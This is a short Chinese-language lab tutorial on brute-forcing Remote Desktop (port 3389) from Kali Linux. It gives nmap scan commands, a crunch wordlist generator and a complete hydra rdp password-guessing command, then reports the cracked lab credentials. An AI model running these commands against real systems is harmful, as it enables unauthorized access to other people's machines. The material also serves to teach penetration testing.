天天看點

Hydra破解遠端端口(3389)

一、實驗環境

Linux kali

目标主機 IP

192.168.31.22

先用nmap掃描目标主機開放的端口

nmap 192.168.31.22
           
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 19:14 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
           

如果出現檢測不到目标主機的情況,就用下面的指令

nmap -PN -sT 192.168.31.22 
           
Hydra破解遠端端口(3389)

kali的字典存放目錄

/usr/share/wordlists/dirbuster
           

這個目錄有部分可供使用的字典,但我們可以更有針對性的制作字典。

crunch 1 4 1234567890 -o password1.txt 
生成長度為1-4的數字密碼,将結果輸出到password1.txt中 
           

hydra [目标主機IP] rdp -L [使用者名字典] -P[密碼字典] -V -F

-V	顯示爆破過程
-F  遇到正确的使用者名及密碼停止爆破
           
hydra 192.168.31.22 rdp -L /usr/share/wordlists/dirbuster/password2.txt -P /usr/share/wordlists/dirbuster/password1.txt -V -F
           
Hydra破解遠端端口(3389)

使用者名:PC 密碼:1

做實驗才弄怎麼簡單的密碼,現實生活中要爆破很久

繼續閱讀